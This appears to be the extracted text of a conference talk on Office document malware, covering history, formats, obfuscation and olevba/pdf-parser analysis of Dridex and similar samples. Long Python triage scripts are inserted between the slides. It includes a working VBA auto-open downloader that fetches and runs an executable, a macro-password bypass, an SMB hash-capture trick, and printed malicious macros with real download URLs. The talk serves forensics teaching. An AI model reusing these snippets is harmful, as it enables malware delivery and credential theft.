© Fidelis Cybersecurity. All rights reserved.
Back to the Future with Document Malware SANS DFIR Summit
Tyler Halfpop
THANK YOU!
PS C:\> Get-Content TylerHalfpop
• Threat Researcher for Fidelis CyberSecurity
• Working on doctorate in computer science
• Adjunct instructor for Dakota State University
• SANS Lethal Forensicator
• Certifications – CISSP, GREM
• Site: tylerhalfpop.com | Twitter: @tylerhalfpop
Eve -> Member of Hacking Group
Alice -> Eve’s Boss
Bob -> R&D @ Awesome Catnip Co.
Bailey -> Bob’s Boss
Billy – IR Fire Fighting Ninja
Agenda
• History of Document Malware and the Recent Resurgence
• Common Format Types Used
• Document Armor
• Tools
• Cases
• Conclusion
History -> Winword.Concept 1995
• WordBasic macro that infected document template files with a non-malicious spreading macro
Payload:
Sub MAIN
REM That's enough to prove my point
End Sub
History -> Party like it's 1999: Melissa
• Malicious macro spreads to contacts
• Large orgs had to shut down email servers
• 400-500k emails in under 3 hours (Whalley, 1999)
(Whipple, n.d.)
Document Malware Resurgence
“Last year, cybercriminals rediscovered the use of Office macros to spread malware. Prevalent in the late 1990s, macro viruses disappeared quickly when newer versions of Microsoft Office had macros disabled by default. However, malware authors have recently started to use social engineering to trick users into enabling macros, thus allowing the malicious code to be executed.” (Grooten, 2015)
History Graph
• Microsoft Office disabled macros by default
• Recent resurgence relies on social engineering
(Szappanos, 2014)
Monthly Stats - Sophos
(Ducklin, 2015)
Q1 2015 Macro Infections – TrendMicro
(Yaneza, 2015)
Office Macro Security Warning
(Szappanos, 2014)
(Talampas, 2015)
Office Formats
• OLE2 - Object Linking and Embedding (OLE) Compound File format
  • 1997-2003
  • FAT format
• XML - Office Open XML (OOXML)
  • .*x files
  • ZIP archive with XML files
• XML 2003 - Office XML
  • Single .xml file
• MHTML
  • Single File Web Page
• RTF
  • Rich Text Format
  • Embedding doc files
Downloader Types - Sophos
(Chantry, 2015)
Auto Macros
Excel:
Sub Auto_Open()
End Sub
Sub Workbook_Open()
End Sub
Word:
Sub AutoOpen()
Auto_Open
End Sub
Downloader Common Actions
1. URLDownloadToFile()
2. XMLHTTP object open method
Deobfuscated Downloaders
(Chantry, 2015)
Simple Macro
Word Doc with Macro
Sub AutoOpen()
    Dim xHttp: Set xHttp = CreateObject("Microsoft.XMLHTTP")
    Dim bStrm: Set bStrm = CreateObject("Adodb.Stream")
    xHttp.Open "GET", "http://192.168.66.254/bad.exe", False
    xHttp.Send
    With bStrm
        .Type = 1
        .Open
        .write xHttp.responseBody
        .savetofile "bad.exe", 2
    End With
    Shell ("bad.exe")
End Sub
Obfuscation
(Ristow, 2015)
Deobfuscation
• Rename variables in a text editor using find/replace
• Decode string camouflaging operations
Password Protected Macros
• Re-save the XML formatted Office file as the older OLE format: (docx, xlsx, pptx) -> (doc, xls, ppt)
Password Protected Macros
• Find the DPB="." string in a hex editor and replace it with the bytes below to change the macro password to "password"
44 50 42 3D 22 35 45 35 43 46 32 32 37 30 45 37
39 32 30 39 36 32 30 39 36 44 46 36 41 32 31 39
36 42 37 46 38 44 31 36 33 45 42 45 32 42 41 31
34 44 32 36 31 36 30 46 33 35 36 41 32 43 33 34
39 31 39 44 36 41 30 36 46 35 42 35 46 39 34 30
38 45 36 22
VBA Downloaders Used By
• Dridex
• Vawtrak
• Dyreza
• Cryptowall
Word Doc with a Network Share Link
Insert -> Object -> Text from File -> HTML file containing
<html><body><img src="\\192.168.66.200\share\oops.jpg" width=1 height=1></body></html>
capture/server/smb or
exploit/windows/exploit/smb/smb_relay modules
Bartalex
(Talampas, 2015)
Dridex
• Tools
  • pdfid & pdf-parser (Stevens, 2015)
  • olevba (Decalage, 2015)
(Levene & Downs, 2015)
(Inocencio, 2014)
PDFID
pdfid hmm.pdf
PDFiD 0.2.1 hmm.pdf
PDF Header: %PDF-1.4
obj 12
endobj 12
stream 2
endstream 2
xref 1
trailer 1
startxref 1
/Page 1
/Encrypt 0
/ObjStm 0
/JS 1
/JavaScript 2
/AA 0
/OpenAction 0
/AcroForm 0
/JBIG2Decode 0
/RichMedia 0
/Launch 0
/EmbeddedFile 1
/XFA 0
/Colors > 2^24 0
PDF Document -> Word Doc -> Macro
0c044fd59cc6ccc28a48937bc69cc0c4)
(Stevens, 2015)
PDF-Parser
pdf-parser hmm.pdf
obj 3 0
Type:
Referencing:
<<
/S /JavaScript
/JS '(var z =
this.dataObjects;\\r\\n
this.exportDataObject\\({cName:z
[0].name, nLaunch:2}\\);)'
>>
obj 2 0
Type: /Filespec
Referencing: 1 0 R, 1 0 R
<<
/Type /Filespec
/F (2.docm)
/UF (2.docm)
/EF
<<
/F 1 0 R
/UF 1 0 R
>>
>>
obj 1 0
Type: /EmbeddedFile
Referencing:
Contains stream
<<
/Length 42719
/Type /EmbeddedFile
/Filter /FlateDecode
/Params
<<
/ModDate "(D:20150811105028+03'00')"
/Size 45430
>>
>>
PDF-Parser
pdf-parser -o 1 -f -d 2.docm hmm.pdf
obj 1 0
Type: /EmbeddedFile
Referencing:
Contains stream
<<
/Length 42719
/Type /EmbeddedFile
/Filter /FlateDecode
/Params
<<
/ModDate "(D:20150811105028+03'00')"
/Size 45430
>>
>>
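The pdfid keyword counts and the pdf-parser extraction shown above can be reproduced in a few dozen lines. The following is an added example, not code from the slides and not the pdfid or pdf-parser code: it counts the same keywords (resolving #xx name escapes the way pdfid does, so /Java#53cript is still counted as /JavaScript), lists /Filespec names, and inflates /EmbeddedFile streams. It runs on a constructed PDF that mirrors the structure of hmm.pdf; the placeholder "docm" bytes and the object layout are assumptions.

```python
import re
import zlib

# Constructed sample PDF (not the hmm.pdf from the slides), laid out like the
# pdfid/pdf-parser output above: document-level JavaScript exports an embedded
# 2.docm, stored as a FlateDecode stream. The "docm" is placeholder bytes.
EMBEDDED_DOCM = b"PK\x03\x04" + b"constructed placeholder, not a real docm\n" * 4
EMBEDDED_STREAM = zlib.compress(EMBEDDED_DOCM)

SAMPLE_PDF = b"".join([
    b"%PDF-1.4\n",
    b"1 0 obj\n<< /Type /EmbeddedFile /Filter /FlateDecode /Length %d"
    b" /Params << /Size %d >> >>\nstream\n" % (len(EMBEDDED_STREAM), len(EMBEDDED_DOCM)),
    EMBEDDED_STREAM, b"\nendstream\nendobj\n",
    b"2 0 obj\n<< /Type /Filespec /F (2.docm) /UF (2.docm)"
    b" /EF << /F 1 0 R /UF 1 0 R >> >>\nendobj\n",
    # /Java#53cript uses a PDF name hex escape: a plain grep for /JavaScript misses it
    b"3 0 obj\n<< /S /Java#53cript /JS (var z = this.dataObjects;"
    b" this.exportDataObject({cName:z[0].name, nLaunch:2});) >>\nendobj\n",
    b"4 0 obj\n<< /Type /Catalog /Names << /EmbeddedFiles << /Names [(2.docm) 2 0 R] >>"
    b" /JavaScript << /Names [(a) 3 0 R] >> >> >>\nendobj\n",
    b"trailer\n<< /Root 4 0 R >>\n%%EOF\n",
])

# The keywords pdfid reports, in its order.
KEYWORDS = ["obj", "endobj", "stream", "endstream", "xref", "trailer", "startxref",
            "/Page", "/Encrypt", "/ObjStm", "/JS", "/JavaScript", "/AA", "/OpenAction",
            "/AcroForm", "/JBIG2Decode", "/RichMedia", "/Launch", "/EmbeddedFile", "/XFA"]
RISKY = ("/JS", "/JavaScript", "/AA", "/OpenAction", "/Launch", "/EmbeddedFile", "/RichMedia", "/XFA")

# "N G obj << dict >> [stream ... endstream] endobj"; simplified, no object streams
OBJ_RE = re.compile(
    rb"(\d+)\s+(\d+)\s+obj\s*(<<.*?>>)\s*(?:stream\r?\n(.*?)\nendstream)?\s*endobj", re.S)


def _unescape_names(data: bytes) -> bytes:
    """Resolve #xx hex escapes inside PDF names (/J#53 is /JS), as pdfid does."""
    return re.sub(rb"#([0-9A-Fa-f]{2})", lambda m: bytes([int(m.group(1), 16)]), data)


def pdfid_counts(data: bytes) -> dict:
    """Keyword counts in the style of the pdfid output above."""
    text = _unescape_names(data)
    counts = {}
    for kw in KEYWORDS:
        if kw.startswith("/"):
            # a name ends at a delimiter, so /Page must not also count /Pages
            pattern = re.escape(kw.encode()) + rb"(?![A-Za-z0-9_])"
        else:
            # keep "obj" from matching inside "endobj" and "stream" inside "endstream"
            pattern = rb"(?<![A-Za-z])" + kw.encode() + rb"(?![A-Za-z])"
        counts[kw] = len(re.findall(pattern, text))
    return counts


def filespec_names(data: bytes) -> list:
    """File names declared by /Filespec dictionaries (the /F (2.docm) entry above)."""
    names = []
    for m in OBJ_RE.finditer(data):
        d = _unescape_names(m.group(3))
        f = re.search(rb"/F\s*\(([^)]*)\)", d) if re.search(rb"/Type\s*/Filespec", d) else None
        if f:
            names.append(f.group(1).decode("latin-1"))
    return names


def extract_embedded_files(data: bytes) -> dict:
    """{object number: decoded bytes} per /EmbeddedFile stream, like pdf-parser -o N -f -d.
    Simplified: only /FlateDecode is handled; the stream is cut at /Length when present."""
    found = {}
    for m in OBJ_RE.finditer(data):
        d, stream = _unescape_names(m.group(3)), m.group(4)
        if stream is None or not re.search(rb"/Type\s*/EmbeddedFile(?![A-Za-z])", d):
            continue
        length = re.search(rb"/Length\s+(\d+)", d)
        if length:
            stream = stream[:int(length.group(1))]
        if re.search(rb"/Filter\s*/FlateDecode", d):
            stream = zlib.decompress(stream)
        found[int(m.group(1))] = stream
    return found


def triage(data: bytes) -> dict:
    """Summary: counts, which risky keywords are present, attachment names and bytes."""
    counts = pdfid_counts(data)
    return {"counts": counts,
            "risky": [k for k in RISKY if counts[k]],
            "attachments": filespec_names(data),
            "embedded": extract_embedded_files(data)}


if __name__ == "__main__":
    report = triage(SAMPLE_PDF)
    for kw, n in report["counts"].items():
        print(f"{kw:<14}{n}")
    print("risky:", report["risky"], "attachments:", report["attachments"])
    for num, blob in report["embedded"].items():
        print(f"obj {num}: {len(blob)} bytes, magic {blob[:4]!r}")
```

A PDF whose only risky keywords are /JS, /JavaScript and /EmbeddedFile, with a /Filespec pointing at an Office file, is exactly the PDF -> Word doc -> macro chain the slides walk through; the inflated bytes are what you hand to olevba next.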
OLEvba
olevba.py 2.docm
olevba 0.40 - http://decalage.info/python/oletools
Flags Filename
----------- -----------------------------------------------------------------
OpX:MASIH--V 2.docm
(Flags: OpX=OpenXML, XML=Word2003XML, MHT=MHTML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, V=VBA strings, ?=Unknown)
===============================================================================
FILE: 2.docm
Type: OpenXML
-------------------------------------------------------------------------------
VBA MACRO ThisDocument.cls
in file: word/vbaProject.bin - OLE stream: u'VBA/ThisDocument'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
OLEvba
Sub autoopen()
VEeve (8.2)
End Sub
Sub VEeve(FFFFF As Long)
FBFILE_FORMAT_1
End Sub
Public Function FBFILE_FORMAT_1()
Set pathIsAbsolute_1 = hCurDir_2(Chr(87) & Chr(60) & Chr(83) & Chr(99) & Chr(61) & Chr(114) & Chr(105) & Chr(112) & Chr(116) & ";" & Chr(46) & Chr(83) & Chr(61) & Chr(104) & Chr(101) & "<" & Chr(108) & Chr(108)).Environment(Chr(80) & Chr(114) & "o" & Chr(99) & Chr(101) & "s" & "s")
pathIsAbsolute_2 = pathIsAbsolute_1("T" & Chr(69) & Chr(77) & Chr(80))
Dim pathIsAbsolute_4 As Object
Set pathIsAbsolute_4 = hCurDir_2(Chr(65) & "<" & "d" & Chr(111) & Chr(59) & Chr(100) & Chr(98) & Chr(61) & Chr(46) & Chr(83) & Chr(116) & Chr(61) & Chr(114) & Chr(60) & Chr(101) & "a" & Chr(59) & Chr(109))
Dim pathIsAbsolute_3 As String
pathIsAbsolute_3 = pathIsAbsolute_2 + "\ce" & Chr(101) + "ce." & "e" & Chr(120) & Chr(101)
With pathIsAbsolute_4
.Type = 1
.Open
.write usZ5pw3gU8(223)
End With
…
OLEvba
+------------+----------------------+-----------------------------------------+
| Type | Keyword | Description |
+------------+----------------------+-----------------------------------------+
| AutoExec | AutoOpen | Runs when the Word document is opened |
| Suspicious | Open | May open a file |
| Suspicious | CreateObject | May create an OLE object |
| Suspicious | Chr | May attempt to obfuscate specific |
| | | strings |
| Suspicious | SaveToFile | May create a text file |
| Suspicious | Write | May write to a file (if combined with |
| | | Open) |
| Suspicious | Hex Strings | Hex-encoded strings were detected, may |
| | | be used to obfuscate strings (option |
| | | --decode to see all) |
| Suspicious | VBA obfuscated | VBA string expressions were detected, |
| | Strings | may be used to obfuscate strings |
| | | (option --decode to see all) |
| IOC | http://mpaya.art.br/ | URL (obfuscation: VBA expression) |
| | 334f3d/096uh5b.exe | |
| IOC | ceece.exe | Executable file name (obfuscation: VBA |
| | | expression) |
| IOC | 096uh5b.exe | Executable file name (obfuscation: VBA |
| | | expression) |
| VBA string | W<Sc=ript;.S=he<ll | (Chr(87) & Chr(60) & Chr(83) & Chr(99) |
| | | & Chr(61) & Chr(114) & Chr(105) & |
| | | Chr(112) & Chr(116) & ";" & Chr(46) & |
| | | Chr(83) & Chr(61) & Chr(104) & Chr(101) |
| | | & "<" & Chr(108) & Chr(108)) |
| VBA string | Process | (Chr(80) & Chr(114) & "o" & Chr(99) & |
| | | Chr(101) & "s" & "s") |
| VBA string | TEMP | ("T" & Chr(69) & Chr(77) & Chr(80)) |
| VBA string | A<do;db=.St=r<ea;m | (Chr(65) & "<" & "d" & Chr(111) & |
| | | Chr(59) & Chr(100) & Chr(98) & Chr(61) |
| | | & Chr(46) & Chr(83) & Chr(116) & |
| | | Chr(61) & Chr(114) & Chr(60) & Chr(101) |
| | | & "a" & Chr(59) & Chr(109)) |
| VBA string | \ceece.exe | "\ce" & Chr(101) + "ce." & "e" & |
| | | Chr(120) & Chr(101) |
| VBA string | S=<hel;l<.Ap;pli<cat | (Chr(83) & Chr(61) & "<" & "h" & "e" & |
| | =ion | Chr(108) & Chr(59) & Chr(108) & "<" & |
| | | Chr(46) & Chr(65) & "p;" & Chr(112) & |
| | | Chr(108) & Chr(105) & "<" & Chr(99) & |
| | | Chr(97) & Chr(116) & Chr(61) & Chr(105) |
| | | & Chr(111) & Chr(110)) |
| VBA string | Mi<cro=soft;.XM<L;HT | (Chr(77) & Chr(105) & Chr(60) & "c" & |
| | =TP | Chr(114) & Chr(111) & Chr(61) & |
| | | Chr(115) & Chr(111) & Chr(102) & "t" & |
| | | Chr(59) & Chr(46) & Chr(88) & "M" & |
| | | Chr(60) & Chr(76) & ";" & "H" & Chr(84) |
| | | & "=" & Chr(84) & "P") |
| VBA string | GET | Chr(71) & Chr(69) & Chr(84) |
| VBA string | http://mpaya.art.br/ | Chr(104) & Chr(116) & "t" & Chr(112) & |
| | 334f3d/096uh5b.exe | Chr(58) & "/" & "/" & Chr(109) & |
| | | Chr(112) & Chr(97) & Chr(121) & Chr(97) |
| | | & Chr(46) & Chr(97) & Chr(114) & |
| | | Chr(116) & Chr(46) & Chr(98) & Chr(114) |
| | | & Chr(47) & "3" & Chr(51) & Chr(52) & |
| | | "f" & Chr(51) & Chr(100) & Chr(47) & |
| | | Chr(48) & Chr(57) & Chr(54) & Chr(117) |
| | | & Chr(104) & Chr(53) & Chr(98) & |
| | | Chr(46) & "e" & Chr(120) & "e" |
| VBA string | < | Chr(60) |
| VBA string | = | Chr(61) |
| VBA string | ; | Chr(59) |
+------------+----------------------+-----------------------------------------+
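The "Decode string camouflaging operations" step from the Deobfuscation slide, applied to the Chr() expressions these olevba tables list, comes down to evaluating the concatenation and then removing the characters the macro itself strips with Replace() (the `<`, `=` and `;` that olevba shows as single-character VBA strings). The following added example is not the slides' code and not olevba: it decodes such expressions, and reports the auto-exec entry points (the Auto Macros slide), suspicious keywords and IOCs over a constructed sample macro; the sample's URL and file name are placeholders and the sample is deliberately incomplete.

```python
import re

# Constructed sample macro (not the slides' 2.docm). It reuses the Chr()-and-junk
# string camouflage that the olevba VBA-string table above decodes; the URL and
# file name are placeholders and the downloader is deliberately left incomplete.
SAMPLE_VBA = r'''
Sub autoopen()
    VEeve (8.2)
End Sub
Sub VEeve(FFFFF As Long)
    FBFILE_FORMAT_1
End Sub
Function hCurDir_2(s As String) As Object
    ' the junk characters are stripped here, right before CreateObject sees the name
    Set hCurDir_2 = CreateObject(Replace(Replace(Replace(s, "<", ""), "=", ""), ";", ""))
End Function
Public Function FBFILE_FORMAT_1()
    Set p1 = hCurDir_2(Chr(87) & Chr(60) & Chr(83) & Chr(99) & Chr(61) & Chr(114) & Chr(105) & Chr(112) & Chr(116) & ";" & Chr(46) & Chr(83) & Chr(61) & Chr(104) & Chr(101) & "<" & Chr(108) & Chr(108))
    p2 = p1.Environment(Chr(80) & Chr(114) & "o" & Chr(99) & Chr(101) & "s" & "s")("T" & Chr(69) & Chr(77) & Chr(80))
    Set p3 = hCurDir_2(Chr(77) & Chr(105) & Chr(60) & "c" & Chr(114) & Chr(111) & Chr(61) & Chr(115) & Chr(111) & Chr(102) & "t" & Chr(59) & Chr(46) & Chr(88) & "M" & Chr(60) & Chr(76) & ";" & "H" & Chr(84) & "=" & Chr(84) & "P")
    p3.Open Chr(71) & Chr(69) & Chr(84), "http://example.invalid/" & Chr(98) & "ad" & Chr(46) & "e" & Chr(120) & Chr(101), False
End Function
'''

# Auto-executing procedure names that olevba flags as AutoExec (Word and Excel).
AUTOEXEC = {"autoexec", "autonew", "autoopen", "autoclose", "autoexit",
            "auto_open", "auto_close", "document_open", "workbook_open"}
# Keyword -> description, in the style of olevba's "Suspicious" rows.
SUSPICIOUS = {
    "CreateObject": "May create an OLE object",
    "WScript.Shell": "May run an executable file or a system command",
    "Microsoft.XMLHTTP": "May download files from the Internet",
    "ADODB.Stream": "May create a text file",
    "SaveToFile": "May create a text file",
    "Environ": "May read system environment variables",
    "Shell": "May run an executable file or a system command",
}

TOKEN = r'(?:Chr\$?\(\d+\)|"(?:[^"]|"")*")'                   # one Chr(n) call or one literal
TOKEN_RE = re.compile(r'Chr\$?\((\d+)\)|"((?:[^"]|"")*)"')
EXPR_RE = re.compile(TOKEN + r'(?:\s*[&+]\s*' + TOKEN + r')+')  # two or more joined by & or +


def decode_vba_string(expr: str) -> str:
    """Evaluate a concatenation of Chr(n) calls and string literals."""
    parts = []
    for chr_arg, literal in TOKEN_RE.findall(expr):
        parts.append(chr(int(chr_arg)) if chr_arg else literal.replace('""', '"'))
    return "".join(parts)


def junk_chars(code: str) -> str:
    """Characters the macro deletes with Replace(x, "c", "") before use (heuristic)."""
    return "".join(dict.fromkeys(re.findall(r',\s*"([^"])"\s*,\s*""\s*\)', code)))


def decode_strings(code: str) -> list:
    """(decoded, cleaned) pairs for every obfuscated string expression in the code."""
    junk = {ord(c): None for c in junk_chars(code)}
    pairs = []
    for m in EXPR_RE.finditer(code):
        decoded = decode_vba_string(m.group(0))
        pairs.append((decoded, decoded.translate(junk)))
    return pairs


def analyze(code: str) -> dict:
    """Minimal olevba-style report: auto-exec entry points, suspicious keywords, IOCs."""
    procs = re.findall(r'^\s*(?:Public\s+|Private\s+)?(?:Sub|Function)\s+(\w+)', code, re.M | re.I)
    decoded = decode_strings(code)
    cleaned = "\n".join(clean for _, clean in decoded)
    haystack = (code + "\n" + cleaned).lower()
    return {
        "autoexec": [p for p in procs if p.lower() in AUTOEXEC],
        "strings": decoded,
        "suspicious": [k for k in SUSPICIOUS if k.lower() in haystack],
        # IOCs come from the decoded strings only: the raw code shows just fragments
        "iocs": {
            "urls": re.findall(r'https?://[^\s"\'<>]+', cleaned),
            "executables": sorted(set(re.findall(r'\b[\w.-]+\.exe\b', cleaned, re.I))),
        },
    }


if __name__ == "__main__":
    report = analyze(SAMPLE_VBA)
    for key in ("autoexec", "suspicious", "iocs"):
        print(key, report[key])
    for raw, clean in report["strings"]:
        print(f"{raw!r:32} -> {clean!r}")
```

The junk-character heuristic reads the macro's own Replace() calls, so it adapts to whatever separator set a given sample uses; expressions that go through a custom decoding function other than Replace() still need manual work, as the slide says.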
Recent Dridex
olevba.py dridex.doc
olevba 0.40 - http://decalage.info/python/oletools
Flags Filename
----------- -----------------------------------------------------------------
OLE:MASI-B-V dridex.doc
(Flags: OpX=OpenXML, XML=Word2003XML, MHT=MHTML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, V=VBA strings, ?=Unknown)
===============================================================================
FILE: dridex.doc
Type: OLE
-------------------------------------------------------------------------------
VBA MACRO ThisDocument.cls
in file: dridex.doc - OLE stream: u'Macros/VBA/ThisDocument'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Sub autoopen()
SSVEvdqwfF3 (7.4)
End Sub
Sub SSVEvdqwfF3(FFFFF As Double)
vtkNormalizeFileToFile
End Sub
+------------+----------------------+-----------------------------------------+
| Type | Keyword | Description |
+------------+----------------------+-----------------------------------------+
| AutoExec | AutoOpen | Runs when the Word document is opened |
| AutoExec | AutoClose | Runs when the Word document is closed |
| Suspicious | Kill | May delete a file |
| Suspicious | Open | May open a file |
| Suspicious | Shell | May run an executable file or a system |
| | | command |
| Suspicious | WScript.Shell | May run an executable file or a system |
| | | command |
| Suspicious | MkDir | May create a directory |
| Suspicious | CreateObject | May create an OLE object |
| Suspicious | Chr | May attempt to obfuscate specific |
| | | strings |
| Suspicious | FileCopy | May copy a file |
| Suspicious | CreateTextFile | May create a text file |
| Suspicious | SaveToFile | May create a text file |
| Suspicious | Environ | May read system environment variables |
| Suspicious | Write | May write to a file (if combined with |
| | | Open) |
| Suspicious | Output | May write to a file (if combined with |
| | | Open) |
| Suspicious | Print # | May write to a file (if combined with |
| | | Open) |
| Suspicious | Shell.Application | May run an application (if combined |
| | | with CreateObject) (obfuscation: VBA |
| | | expression) |
| Suspicious | ADODB.Stream | May create a text file (obfuscation: |
| | | VBA expression) |
| Suspicious | Microsoft.XMLHTTP | May download files from the Internet |
| | | (obfuscation: VBA expression) |
| Suspicious | Base64 Strings | Base64-encoded strings were detected, |
| | | may be used to obfuscate strings |
| | | (option --decode to see all) |
| Suspicious | VBA obfuscated | VBA string expressions were detected, |
| | Strings | may be used to obfuscate strings |
| | | (option --decode to see all) |
| IOC | http://www.schmidks. | URL |
| | de | |
| IOC | http://www.StealthBo | URL |
| | t.net/sb/Launcher/ | |
| IOC | zzA.exe | Executable file name (obfuscation: VBA |
| | | expression) |
© Fidelis Cybersecurity. All rights reserved. 57
![Page 59: Back to the Future with Document Malware - SANS · Back to the Future with Document Malware SANS DFIR Summit ... Insert -> Object -> Text from File -> HTML file containing ... May](https://reader033.fdocuments.in/reader033/viewer/2022051509/5ade66fb7f8b9a213e8e0f22/html5/thumbnails/59.jpg)
+------------+----------------------+-----------------------------------------+
| Type | Keyword | Description |
+------------+----------------------+-----------------------------------------+
| VBA string | ;<=Shell.Application | (";<=" + Chr(83) & "h" & "e" & Chr(108) |
| | | & Chr(108) & Chr(46) & Chr(65) & "p" & |
| | | Chr(112) & Chr(108) & Chr(105) & |
| | | Chr(99) & Chr(97) & Chr(116) & Chr(105) |
| | | & Chr(111) & Chr(110)) |
| VBA string | Dim,Wb,Err,Number,De | "Dim" & "," & "Wb" & "," & |
| | scription,Source,Cou | "Err" & "," & "Number" & "," & |
| | nt,File,Folder,Scrip | "Description" & "," & "Source" & |
| | ting,Boolean,String, | "," & "Count" & "," & "File" & |
| | Integer,addModule,re | "," & "Folder" & "," & |
| | turnValue,retVal,fil | "Scripting" & "," & "Boolean" & "," |
| | eName,saveChanges, | & "String" & "," & "Integer" & |
| | | "," & "addModule" & "," & |
| | | "returnValue" & "," & "retVal" & |
| | | "," & "fileName" & "," & |
| | | "saveChanges" & "," & "" |
| VBA string | Microsoft.XMLHTTP | (Chr(77) & Chr(105) & "c" & Chr(114) & |
| | | Chr(111) & Chr(115) & Chr(111) & |
| | | Chr(102) & "t" & Chr(46) & Chr(88) & |
| | | "M" & Chr(76) & "H" & Chr(84) & Chr(84) |
| | | & "P") |
© Fidelis Cybersecurity. All rights reserved. 58
![Page 60: Back to the Future with Document Malware - SANS · Back to the Future with Document Malware SANS DFIR Summit ... Insert -> Object -> Text from File -> HTML file containing ... May](https://reader033.fdocuments.in/reader033/viewer/2022051509/5ade66fb7f8b9a213e8e0f22/html5/thumbnails/60.jpg)
+------------+----------------------+-----------------------------------------+
| Type | Keyword | Description |
+------------+----------------------+-----------------------------------------+
| VBA string | \tmp_ | "\" & "tmp_" |
| VBA string | http://www.n | Chr(104) & Chr(116) & "t" & Chr(112) & |
| | | Chr(58) & "/" & "/" & Chr(119) & |
| | | Chr(119) & Chr(119) & Chr(46) & "n" |
| VBA string | GET | Chr(71) & "E" & Chr(84) |
| VBA string | orlabs.de/123/1111.e | Chr(111) & Chr(114) & Chr(108) & |
| | xe | Chr(97) & "b" & Chr(115) & Chr(46) & |
| | | Chr(100) & Chr(101) & Chr(47) & Chr(49) |
| | | & Chr(50) & Chr(51) & Chr(47) & Chr(49) |
| | | & Chr(49) & Chr(49) & Chr(49) & Chr(46) |
| | | & "e" & Chr(120) & "e" |
+------------+----------------------+-----------------------------------------+
© Fidelis Cybersecurity. All rights reserved. 59
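The rows above are olevba's keyword and string-expression report for the sample. As an added example (not olevba's code and not part of the talk), the Python below reproduces the two pieces of that report an analyst most often has to redo by hand: evaluating the Chr()/concatenation chains that hide strings such as Shell.Application and Microsoft.XMLHTTP, and re-scanning the decoded strings against a keyword table so that an obfuscated keyword still surfaces with the "(obfuscation: VBA expression)" note. The keyword table is a reduced copy of the one above, and the macro it runs on is constructed for this example, reusing the Shell.Application chain from the report.

```python
import re

# Grammar subset used by obfuscated macros: string literals, Chr(n), the & and +
# concatenation operators, and parentheses. Anything else is rejected.
_LIT = r'"(?:[^"]|"")*"'
_CHR = r'Chr\s*\(\s*\d+\s*\)'
_ATOM = rf'(?:{_LIT}|{_CHR})'
# Two or more atoms joined by & or +: what olevba reports as a "VBA string".
_EXPR = re.compile(rf'(?:{_ATOM}\s*[&+]\s*)+{_ATOM}', re.I)
_TOKEN = re.compile(rf'({_LIT})|Chr\s*\(\s*(\d+)\s*\)|([&+()])|(\s+)', re.I)

# Keyword tables: a reduced copy of the olevba categories shown above (assumption: subset only).
AUTOEXEC = ("AutoOpen", "AutoClose", "AutoExec", "Document_Open", "Workbook_Open")
SUSPICIOUS = {
    "Shell": "May run an executable file or a system command",
    "WScript.Shell": "May run an executable file or a system command",
    "Shell.Application": "May run an application (if combined with CreateObject)",
    "CreateObject": "May create an OLE object",
    "Chr": "May attempt to obfuscate specific strings",
    "Environ": "May read system environment variables",
    "Kill": "May delete a file",
    "ADODB.Stream": "May create a text file",
    "Microsoft.XMLHTTP": "May download files from the Internet",
}


def eval_vba_string_expr(expr: str) -> str:
    """Evaluate a VBA string expression made only of literals, Chr(n), & / + and parentheses."""
    out, depth, pos = [], 0, 0
    while pos < len(expr):
        m = _TOKEN.match(expr, pos)
        if not m:
            raise ValueError(f"unsupported VBA token near {expr[pos:pos + 20]!r}")
        pos = m.end()
        lit, code, op, _ws = m.groups()
        if lit is not None:
            out.append(lit[1:-1].replace('""', '"'))   # VBA doubles a quote inside a literal
        elif code is not None:
            out.append(chr(int(code)))
        elif op == "(":
            depth += 1
        elif op == ")":
            depth -= 1
            if depth < 0:
                raise ValueError("unbalanced parenthesis")
        # "&" and "+" both concatenate strings in VBA, so they need no action
    if depth:
        raise ValueError("unbalanced parenthesis")
    return "".join(out)


def decode_string_expressions(source: str) -> list:
    """Find every concatenation chain in a macro and return its decoded value, in order."""
    return [eval_vba_string_expr(m.group(0)) for m in _EXPR.finditer(source)]


def _present(keyword: str, text: str) -> bool:
    return re.search(r"(?<!\w)" + re.escape(keyword) + r"(?!\w)", text, re.I) is not None


def scan_macro(source: str) -> list:
    """Return (Type, Keyword, Description) triples in the spirit of the olevba table."""
    decoded = decode_string_expressions(source)
    findings = [("AutoExec", name, "Runs automatically when the document is opened or closed")
                for name in AUTOEXEC if _present(name, source)]
    for keyword, description in SUSPICIOUS.items():
        in_source = _present(keyword, source)
        in_decoded = any(_present(keyword, d) for d in decoded)
        if in_source or in_decoded:
            if not in_source:          # only visible after deobfuscation, as olevba marks it
                description += " (obfuscation: VBA expression)"
            findings.append(("Suspicious", keyword, description))
    findings.extend(("VBA string", d, "decoded from a Chr()/concatenation chain") for d in decoded)
    return findings


# Constructed sample macro (not a real document); the first chain is the one from the report above.
SAMPLE_MACRO = r'''
Sub AutoOpen()
    Dim o
    Set o = CreateObject(Chr(83) & "h" & "e" & Chr(108) & Chr(108) & Chr(46) & Chr(65) & "p" & Chr(112) & Chr(108) & Chr(105) & Chr(99) & Chr(97) & Chr(116) & Chr(105) & Chr(111) & Chr(110))
    tmp = Environ("TEMP") & "\" & "tmp_"
End Sub
'''

if __name__ == "__main__":
    for row in scan_macro(SAMPLE_MACRO):
        print("| %-10s | %-20s | %s" % row)
```

The evaluator deliberately handles only the literal / Chr(n) / & / + subset: an expression that needs anything else (variables, Mid, StrReverse, arithmetic) raises instead of silently returning a partial string, which is the cue to stop with static tools and step the macro in the debugger.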
Debugging
Vawtrak
(Trend Micro, 2015)
CRIGENT / Powerworm
Worm that uses Office macros and PowerShell
Private Sub Workbook_Open()
b = "JwBDAEkREDACTEDREDACTED" _
& "QA7ACcAcgREDACTEDREDACTED" _
& "BzACgAKQAREDACTEDREDACTED" _
& "jAGUAIAAtREDACTEDREDACTED" _
& "ACAAUwB5AREDACTEDREDACTED" _
& "GcALgBpAGREDACTEDREDACTED" _
& "4AIAAtAGEREDACTEDREDACTED" _
& "AdAAuAHAAREDACTEDREDACTED"
Set a = CreateObject("WScript.Shell")
a.Run "powershell.exe" & " -noexit -encodedcommand " & b, 0, False
End Sub
' -encodedcommand: executes a base64-encoded script and does not honor the execution policy
' d586f8a60160cf3d1ef42c7424cab5b7
